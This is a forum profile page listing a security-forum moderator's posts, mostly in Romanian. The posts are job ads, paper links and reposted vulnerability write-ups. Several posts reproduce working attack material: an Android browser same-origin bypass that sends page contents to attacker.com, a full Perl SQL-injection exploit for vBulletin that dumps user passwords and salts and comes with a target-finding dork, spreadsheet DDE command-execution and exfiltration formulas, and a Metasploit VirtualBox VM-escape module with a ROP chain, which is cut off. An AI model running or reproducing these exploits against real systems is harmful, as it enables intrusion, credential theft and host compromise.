Jump to content

SirGod

Moderators
  • Posts

    784
  • Joined

  • Last visited

  • Days Won

    27

Everything posted by SirGod

  1. Background freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC Group’s Cyber Defence Operations team provided pro bono digital forensic and reverse engineering services to assist the freenode infrastructure team with their incident response activities. In this post we discuss a subset of the information we documented about one of the components involved in the compromise, specifically a Linux backdoor with some interesting functionality and features. One difficulty all attackers face after compromising a system is how to retain control over a long period of time in a stealthy manner. Backdoor tools which listen for incoming connections can be easily identified by a port scan or by listing open sockets. Tools which periodically connect outbound to a server are usually limited to a small number of addresses or a predictable domain generation algorithm. The backdoor discussed in this post avoids these issues by using a novel method for recognising specially generated incoming packets, bypassing most typical host firewalls and enabling the attacker to change IP address without losing access. Articol full (sursa) : https://www.nccgroup.com/en/blog/2014/10/analysis-of-the-linux-backdoor-used-in-freenode-irc-network-compromise/
  2. Pentru ce vrei sa faci mass-scan? Ai cumva o retea mare in administrare si vrei sa vezi ce servere sunt afectate pentru a remedia? Daca da, te ajut eu.
  3. Urat. Mailing list: oss-security - CVE-2014-6271: remote code execution through bash Pentru cei lenesi: Source: oss-security - Re: CVE-2014-6271: remote code execution through bash
  4. Testat, functioneaza. In cazul in care folositi browserul default din Android, renuntati la el, cel putin momentan. [h=4]Introduction[/h]Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another. [h=4]SOP Bypass[/h]A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser. Update: Other folks have verified this issue to work under Android browser < 4.4. Ref - https://github.com/rapid7/metasploit-framework/pull/3759 The following is a proof of concept: [h=4]Proof Of Concept[/h] <iframe name="test" src="http://www.rhainfosec.com"></iframe> <input type=button value="test" onclick="window.open('\u0000javascript:alert(document.domain)','test')" > As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com. Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match. vagugebiweja:7 However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin. I created the following POC, so you can mess around with some stuff: [h=4]Reading the response[/h]You can read the response of any page by accessing the document.body.innerHTML property. <iframe name="test" src="http://www.rhainfosec.com"></iframe> <input type=button value="test" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" > [h=4]Reading the response and sending it to an attackers domain[/h]In real world situation an attacker would send the response to his controlled domain. <iframe name="test" src="http://www.rhainfosec.com"></iframe> <input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" > [h=4]Bypassing Frame Busting Code[/h]A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications. <iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe> <input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" > Update: A metasploit module has been released by jvennix-r7 which also supports x-frame-options bypass making it a completely universal exploit. Ref - https://github.com/rapid7/metasploit-framework/pull/3759 [h=4]Affected Versions[/h]The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc. The following are some of the smartphones i tested with browserstack.com. [h=4]Samsung Galaxy S3[/h] [h=4]Motrorolla Razr[/h] [h=4]Sony Xperia Tipo[/h] [h=4]HTC Evo 3D and Wildfire[/h] Sursa: Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041 | Learn How To Hack - Ethical Hacking and security tips
  5. OWASP Testing Guide v4 1. Testing Guide Foreword 2. The OWASP Testing Project 3. The OWASP Testing Framework 4. Web Application Security Testing 5. Reporting Link PDF: https://www.owasp.org/images/1/19/OTGv4.pdf
      • 1
      • Upvote
  6. Link PDF: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
  7. Se cauta si: Web designer: Minimum 2 years experience in graphic design and website implementation; Projects portfolio required; Good knowledge on branding, UI, UX, mobile, front-end frameworks, print; Very good work experience with graphics software: Photoshop and Illustrator mainly (but also Corel Draw, Flash, InDesign etc); HTML5 & CSS3 solid knowledge; Basic JS knowledege; Basic SEO knowledge; Strong English verbal and written communication skills; Good time management and working within deadlines.
  8. Doar pentru oameni seriosi. CV prin PM. Locatie: Bucuresti Java Developer At least 2 years of experience with web development; English knowledge; University degree in Computer Science or similar; Experience in working with: Java EE development; Web application development (JSP, servlets, XML and HTML); Web frameworks, at least one of the following: Struts 2, Spring MVC, JSF or any other web framework; Build automation tools (Maven); Relational databases, at least one of the following: SQL Server, MySQL, Oracle; SCMs: Git or Svn; Communication protocols: HTTP, TLS/SSL. PHP Developer At least 2 -3 years experience in web development (advantage for project portfolios); Student or graduate in Automatics, Electronics, Mathematics and Computer Science; Must have high skills of PHP, SQL (MySQL, PostgreSQL), HTML, JavaScript; Nice to have knowledge of XML, RSS, Apache, Linux, communication protocols; English skills; Responsibility and initiative; Interested in a professional career in the web development field. QA Engineer University degree in computer science or equivalent; Knowledge of the software development process and life cycle; Knowledge and understanding of the Quality Assurance process; QA experience in minimum 2 medium / large size projects; Medium knowledge of databases, web programming and communication protocols; Programming skills in C#, ASP.NET, PHP, HTML, CSS, AJAX or JavaScript represent an advantage; End to end automated testing experience is an advantage.
  9. Cuprins: A1 - CORS Attacks & CSRF A2 - ClickJacking, CORJacking and UI exploits A3 - XSS with HTML5 tags, attributes and events A4 - Web Storage and DOM information extraction A5 - SQLi & Blind Enumeration A6 - Web Messaging and Web Workers injections A7 - DOM based XSS with HTML5 & Messaging A8 - Third party/Offline HTML Widgets and Gadgets A9 - Web Sockets and Attacks A10 - Protocol/Schema/APIs attacks with HTML5 Download: https://media.blackhat.com/bh-eu-12/shah/bh-eu-12-Shah_HTML5_Top_10-WP.pdf
  10. # vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit # Author: D35m0nd142, <d35m0nd142@gmail.com> # Google Dork: inurl:search.php?search_type=1 # Date: 02/09/2014 # Vendor Homepage: http://www.vbulletin.com/ # Tested on: vBulletin 4.1.2 # Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack> # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc # IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'. # Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/) #!/usr/bin/env perl use LWP::UserAgent; use HTTP::Cookies; $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0"); $ua->cookie_jar({}); $username = "username) from user where userid=$ARGV[4]#"; $email = "email) from user where userid=$ARGV[4]#"; $password = "password) from user where userid=$ARGV[4]#"; $salt = "salt) from user where userid=$ARGV[4]#"; @tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt); sub request { my $token = dumping("vbloginout.txt","token"); if($token eq '') { print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n"; #print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n"; $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE print "Attempting using $token as token.\n"; } else { print "SECURITYTOKEN FOUND: $token\n"; } print "Sending exploit...\n\n"; sleep(1); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); break; } #print "Location: $location\n"; my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; print "Do you want to run the second exploitation way? (y/n) -> "; $want = <STDIN>; if($want =~ /y/) { second_request($token); } } sub second_request { my ($token) = @_ ; print "Attempting using the second exploitation way..\n\n"; sleep(2); my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php'); $req->content_type('application/x-www-form-urlencoded'); foreach $tofind (@tofinds) { $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); if($location !~ /$ARGV[0]/) { banner(); exit(1); } #print "Location: $location\n"; my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); printout($tofind); dumping("vbout.txt","sql"); print "\n"; } print "\n"; } sub banner { print "[-] Exploit not successful!\n"; if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303") { print "[i] Try to log in and log out from other any other sessions and run the exploit again.\n\n"; } } sub printout { my ($tofind) = @_ ; if($tofind =~ /username/) { print "[+] User($ARGV[4]) Username: "; } elsif($tofind =~ /password/) { print "[+] User($ARGV[4]) Password: "; } elsif($tofind =~ /database/) { print "[+] Database Name: "; } elsif($tofind =~ /email/) { print "[+] User($ARGV[4]) Email: "; } elsif($tofind =~ /salt/) { print "[+] User($ARGV[4]) Salt: "; } } sub dumping { my ($filename, $par) = @_ ; open(MYFILE,"< ", $filename); my @files) { unlink $file; }
  11. [h=4]By James Kettle, 29 Aug. 2014[/h]This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique. [h=4][/h][h=4]Formula Injection[/h]Many modern web applications and frameworks offer spreadsheet export functionality, allowing users to download data in a .csv or .xls file suitable for handling in spreadsheet applications like Microsoft Excel and OpenOffice Calc. The resulting spreadsheet’s cells often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses. This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae. For example, picture an online store that allows administrators to export the details of all recent purchases. If a malicious customer buys a product and sets their delivery address to the following: =HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information") The administrator’s ‘recent purchases’ spreadsheet will contain the following cell: If the administrator clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to http://contextis.co.uk, which may include other users’ payment details. [h=4]Delivering exploits[/h]Malicious formulae pose a risk even when the embedding spreadsheet doesn’t contain any sensitive information, as they can be used to compromise the viewer’s computer. Dynamic Data Exchange (DDE) is a protocol for interprocess communication under Windows supported by Microsoft Excel, LibreOffice and Apache OpenOffice. In the latter two, it can be invoked using the following formula: =DDE(server; file; item; mode) Context found that by specifying some creative arguments and a magic number, it’s possible to craft a ‘link’ that hijacks the computer of whoever opens the document. The following formula simply launches calc.exe but it could easily conscript the computer into a botnet or just about anything else. =DDE("cmd";"/C calc";"__DdeLink_60_870516294") When this formula is viewed in a typical spreadsheet, the user is shown an innocuous warning first: However, when the payload is inside a CSV, the command is executed before the warning is displayed. This vulnerability was privately disclosed to the affected vendors on the 9th July 2014. OpenOffice and LibreOffice patched it on 21stAugust and the 10th July respectively. OpenOffice classified it as CVE-2014-3524 and LibreOffice failed to acknowledge it. This is unlikely to be the last formula based vulnerability, and formula injection provides an excellent delivery mechanism for such exploits. A given computer’s susceptibility to attack can be assessed using the INFO formula, which helpfully returns the spreadsheet software‘s name, operating system and version number. Conditional IF… ELSE statements can then be used to deliver the appropriate payload. [h=4]Exploiting trust relationships[/h]A second, more subtle technique can be used to hijack users’ computers without relying on an unpatched vulnerability in client software. We will once again use our good friend DDE, but this time target Microsoft Excel. In Excel, the syntax to execute arbitrary commands is simply: =cmd|' /C calc'!A0 Microsoft is clearly aware that DDE can be used maliciously; opening a document containing DDE triggers two fearsome security warnings: However, there is a serious issue with these warning messages. They both recommend that the user should click no if they do not trust the source of the file. If you had personally generated a spreadsheet from a website you trust, would you trust it? You might if you had skipped the section on formula injection. This is not a vulnerability in Excel, but in every website that places active content from untrusted sources into spreadsheets. [h=4]Remediation[/h]Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed. Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them. Finally, ensure you’re running Apache OpenOffice version 4.1.1 or later, and LibreOffice version 4.2.5 or later. [h=4]Further research[/h]This issue isn’t specific to web applications or any particular file format – any situation where untrusted content ends up in a spreadsheet could be exploited. Aside from identifying the numerous vulnerable applications, there is plenty of scope for further research on this attack technique itself. A key improvement would be finding a way to extract content from documents without relying on any user interaction. Finally, spreadsheet software presents a soft attack surface relative to web browsers, so it is likely that further investigation may reveal additional formula-based code execution vulnerabilities. Thanks to Rohan Durve for help crafting the DDE payloads, and the OpenOffice security team for gracefully handling them.
  12. By Brad Antoniewicz. I've been an adjunct professor at NYU Poly for almost two years now. It's been a great experience for a number of reasons, one of which is because I'm teaching a hot topic: Vulnerability Analysis and Exploitation. The course is the next iteration of the pentest.cryptocity.net content that evolved into the CTF Field Guide by Dan Guido, Trail of Bits, and a bunch of other industry professionals. It takes a student with some minor programming knowledge and submerges them into exploitation. When the student comes out, they have successfully exploited IE on Windows 7, bypassing DEP and ASLR. It's an awesome, but sometimes overwhelming experience for every student who takes it. Each semester I start the class off with a survey to gauge the student's experience level: No surprise here, most have little to no experience when it comes to real-world exploitation on Windows. This results in a "revamping" period for the student where they have to work extra hard getting used to WinDBG and IDA. I wanted to create something that would help ease the students into the learning environment, and that's what FSExploitMe is; a tutorial that walks you through the basics of WinDBG and general exploitation in a browser environment. FSExploitMe is based on Vulnerable.ocx, developed by the original creators of the class. [h=1]Installation[/h]FSExploitMe is a self-contained, Active X based tutorial that you download and run locally within your browser. You'll want to run this in a VM, as it makes your browser vulnerable to attack. Ensure you have the Microsoft Visual C++ 2010 Redistributable Package installed. Then just double clickFSExploitMe.html to get started. You'll have the allow the extension to run by right clicking the banner and selecting "Allow Blocked Content...": Next Internet Explorer will ask you if you'd like to allow the active content to run, click "Yes": Then finally you'll get a UAC prompt, click "Yes" here as well: FSExploitMe should be all ready to go now: Internet Explorer 8 looks a little less pretty then newer versions. IE8 is the recommended version strictly because Lesson 3 of FSExploitMe executes a HeapSpray that will not work on newer versions of IE. You can easily replace that function to use a newer HeapSpray, I just haven't done that and tested it on all other IE versions. That being said, future iterations of FSExploitMe will include a more robust HeapSpray Function. It will help to have Symbols when you start debugging. The easiest way to do that is by copying theFSExploitMe.pdb file to the C:\Windows\Downloaded Program Files directory. Then once you launch WinDBG, add that path to your Symbol Path: .sympath+ C:\Windows\Downloaded Program Files [h=1]About the Lessons[/h]When you first open FSExploitMe.html in your browser, you'll arrive at the welcome screen which gives you an overview of the Installation plus learning resources to get you off the ground with x86, IDA and WinDBG if you have absolutely no experience with them. You can return back to this page by clicking the "FSExploitMe" heading on the upper left of the page. Each activity is broken up into Lessons and can be accessed by using the links on the upper right of the screen: On newer versions, it will look a little prettier. I promise, i'll put in that new HeapSpray function soon [h=2]Lesson 1 - Learning WinDBG[/h]Lesson 1 is entirely dedicated to WinDBG since it is so important to the whole exploitation process. The questions will require you to set breakpoints, dig into memory, and execute some common commands to obtain answers. [h=2]Lesson 2 - Stack-Based Overflow[/h]Lesson 2 is focused around exploiting a basic stack-based overflow. The questions require you to understand how the stack operates, how to triage a stack-based overflow and finally how to exploit the condition. The first round walks you through the exploitation, the second is a bit harder - there is no walkthrough and it requires the use of IDA. [h=2]Lesson 3 - Use-After-Free on the Heap[/h]Lesson 3 walks you through a use-after-free vulnerability on the heap. The questions help you understand how data is stored on the heap, how virtual function tables and pointers are structured, how to triage a use-after-free and finally how to exploit it. This very much mimics a traditional browser use-after-free and should get you on the right track when you have to tackle a real-world vulnerability. [h=2]Upcoming Lessons[/h]The next few lessons that will be written will focus on bypassing exploit mitigations! Stay tuned! [h=1]Download[/h]FSExploitMe is available for download now! Answers can be provided if you just ask me for them, and you're not one of my students https://github.com/OpenSecurityResearch/FSExploitMe Feedback welcome!
  13. 1. Browser fuzzing technology 2. Advanced browser exploitation techniques 3. IE 11 0day exploit development Link PDF: http://hitcon.org/2014/downloads/P1_06_Chen%20Zhang%20-%20Smashing%20The%20Browser%20-%20From%20Vulnerability%20Discovery%20To%20Exploit.pdf
      • 1
      • Upvote
  14. ### This module requires Metasploit: http//metasploit.com/download # Current source: [URL]https://github.com/rapid7/metasploit-framework[/URL] ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' INVALID_HANDLE_VALUE = 0xFFFFFFFF # VBOX HGCM protocol constants VBOXGUEST_IOCTL_HGCM_CONNECT = 2269248 VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252 VBOXGUEST_IOCTL_HGCM_CALL = 2269256 CONNECT_MSG_SIZE = 140 DISCONNECT_MSG_SIZE = 8 SET_VERSION_MSG_SIZE = 40 SET_PID_MSG_SIZE = 28 CALL_EA_MSG_SIZE = 40 VERR_WRONG_ORDER = 0xffffffea SHCRGL_GUEST_FN_SET_PID = 12 SHCRGL_CPARMS_SET_PID = 1 SHCRGL_GUEST_FN_SET_VERSION = 6 SHCRGL_CPARMS_SET_VERSION = 2 SHCRGL_GUEST_FN_INJECT = 9 SHCRGL_CPARMS_INJECT = 2 CR_PROTOCOL_VERSION_MAJOR = 9 CR_PROTOCOL_VERSION_MINOR = 1 VMM_DEV_HGCM_PARM_TYPE_32_BIT = 1 VMM_DEV_HGCM_PARM_TYPE_64_BIT = 2 VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5 def initialize(info={}) super(update_info(info, { 'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape', 'Description' => %q{ This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted of rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, 'License' => MSF_LICENSE, 'Author' => [ 'Francisco Falcon', # Vulnerability Discovery and PoC 'Florian Ledoux', # Win 8 64 bits exploitation analysis 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)', { :messages => :target_virtualbox_436_win7_64 } ] ], 'Payload' => { 'Space' => 7000, 'DisableNops' => true }, 'References' => [ ['CVE', '2014-0983'], ['BID', '66133'], ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'], ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'], ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php'] ], 'DisclosureDate' => 'Mar 11 2014', 'DefaultTarget' => 0 })) end def open_device r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0) handle = r['return'] if handle == INVALID_HANDLE_VALUE return nil end return handle end def send_ioctl(ioctl, msg) result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "") if result["GetLastError"] != 0 unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0 unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end result end def connect msg = "\x00" * CONNECT_MSG_SIZE msg[4, 4] = [2].pack("V") msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL" result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg) if result.nil? return result end client_id = result["lpOutBuffer"][136, 4].unpack("V").first client_id end def disconnect msg = "\x00" * DISCONNECT_MSG_SIZE msg[4, 4] = [@client_id].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg) result end def set_pid(pid) msg = "\x00" * SET_PID_MSG_SIZE msg[0, 4] = [VERR_WRONG_ORDER].pack("V") msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V") msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V") msg[20, 4] = [pid].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def set_version msg = "\x00" * SET_VERSION_MSG_SIZE msg[0, 4] = [VERR_WRONG_ORDER].pack("V") msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V") msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V") msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def trigger(buff_addr, buff_length) msg = "\x00" * CALL_EA_MSG_SIZE msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V") msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") msg[20, 4] = [@client_id].pack("V") # u32ClientID msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V") msg[32, 4] = [buff_length].pack("V") # size_of(buf) msg[36, 4] = [buff_addr].pack("V") # (buf) result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def stack_adjustment pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset... pivot end def target_virtualbox_436_win7_64(message_id) opcodes = [0xFF, 0xea, 0x02, 0xf7] opcodes_hdr = [ 0x77474c01, # type CR_MESSAGE_OPCODES 0x8899, # conn_id opcodes.length # numOpcodes ] if message_id == 2 # Message used to achieve Code execution # See at the end of the module for a better description of the ROP Chain, # or even better, read: [URL="http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php"]VUPEN Vulnerability Research Blog - Advanced Exploitation of VirtualBox 3D Acceleration VM Escape Vulnerability / Exploit (CVE-2014-0983)[/URL] # All gadgets from VBoxREM.dll opcodes_data = [0x8, 0x30, 0x331].pack("V*") opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret opcodes_data << [112].pack("Q<") # RDX opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp opcodes_data << Rex::Text.pattern_create(80) opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here opcodes_data << Rex::Text.pattern_create(104 - 80 - 8) opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize) opcodes_data << Rex::Text.pattern_create(140 - 104 - 8) opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect) opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64) opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr. opcodes_data << "A" * 8 opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9 opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10 opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608 opcodes_data << "A" * (624 - 24 - 5) opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot opcodes_data << stack_adjustment opcodes_data << payload.encoded opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length) else # Message used to corrupt head_spu # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data # 8196 => On my tests, this data size allows to keep the memory # not reused until the second packet arrives. The second packet, # of course, must have 8196 bytes length too. So this memory is # reused and code execution can be accomplished. opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*") opcodes_data << "B" * (8196 - opcodes_data.length) end msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data msg end def send_opcodes_msg(process, message_id) msg = self.send(target[:messages], message_id) mem = process.memory.allocate(msg.length + (msg.length % 1024)) process.memory.write(mem, msg) trigger(mem, msg.length) end def check handle = open_device if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) Exploit::CheckCode::Detected end def exploit unless self.respond_to?(target[:messages]) print_error("Invalid target specified: no messages callback function defined") return end print_status("Opening device...") @handle = open_device if @handle.nil? fail_with(Failure::NoTarget, "#{DEVICE} device not found") else print_good("#{DEVICE} found, exploiting...") end print_status("Connecting to the service...") @client_id = connect if @client_id.nil? fail_with(Failure::Unknown, "Connect operation failed") end print_good("Client ID #{@client_id}") print_status("Calling SET_VERSION...") result = set_version if result.nil? fail_with(Failure::Unknown, "Failed to SET_VERSION") end this_pid = session.sys.process.getpid print_status("Calling SET_PID...") result = set_pid(this_pid) if result.nil? fail_with(Failure::Unknown, "Failed to SET_PID") end this_proc = session.sys.process.open print_status("Sending First 0xEA Opcode Message to control head_spu...") result = send_opcodes_msg(this_proc, 1) if result.nil? fail_with(Failure::Unknown, "Failed to control heap_spu...") end print_status("Sending Second 0xEA Opcode Message to execute payload...") @old_timeout = session.response_timeout session.response_timeout = 5 begin send_opcodes_msg(this_proc, 2) rescue Rex::TimeoutError vprint_status("Expected timeout in case of successful exploitation") end end def cleanup unless @old_timeout.nil? session.response_timeout = @old_timeout end if session_created? # Unless we add CoE there is nothing to do return end unless @client_id.nil? print_status("Disconnecting from the service...") disconnect end unless @handle.nil? 